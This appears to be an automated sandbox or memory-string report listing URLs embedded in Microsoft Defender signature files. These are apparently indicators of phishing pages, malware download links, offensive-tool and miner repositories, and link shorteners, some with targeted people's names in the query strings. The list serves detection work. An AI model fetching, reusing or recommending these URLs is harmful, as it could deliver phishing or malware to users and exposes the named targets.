Source: MpSigStub.exe, 0000000B.00000003.18265560901.0000021B5F5C8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 0000000B.00000003.18265560901.0000021B5F5C8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 0000000B.00000003.18265560901.0000021B5F5C8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 0000000B.00000003.18265560901.0000021B5F5C8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp String found in binary or memory: https://github.com/georgw777/
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp String found in binary or memory: https://github.com/georgw777/MediaManager
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/nwoolls/multiminer
Source: mpam-728dfe11.exe, 00000011.00000003.18617240390.0000027770025000.00000004.00000001.sdmp String found in binary or memory: https://github.com/open-source-parsers/jsoncpp.git)
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://goodbyegraffitiseattle.com/jhjdhjd/files/index.php)
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://griginet.com/ggassh/sshrod.php
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://h9-mil.live/?e=anita.masyk
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://handrug.com.py/baterfly/aleacarte.php
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp String found in binary or memory: https://hastebin.com/raw/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/ajo/processor.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/egab/processor.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/emzf/processor.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/lin/processor.php
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://humana.service-now.com/arp
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://i.gyazo.com/7fc7a0126fd7e7c8bcb89fc52967c8ec.png
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: https://i.imgur.com/c1skhwk.png
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dll
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dllx
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://immobiliareneri.casa/drms/ind.html
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://jcenter.bintray.com
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://kamalandcompany.com/drms/fert.html
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: https://kelwinsales.com/ds/1702.gif
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://kenosis.ml/wp-content/upgrabe/
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/2nuds
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://liquide.co/3qyyerb6gvx/ind.html
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://livelongerfeelbetter.com/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://loginmixcrhustim0fficia6.ga/xi/policy.php
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/raw
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: https://notafiscaleletronica-e.com/master/
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://nowfoundation.org.uk/hx0smmmbiw/haurt.html
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exe
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exeac
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: https://oksearch.org/xa2/click.html
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://opposedent.com/css/main.css/send.css
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.com/api/
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
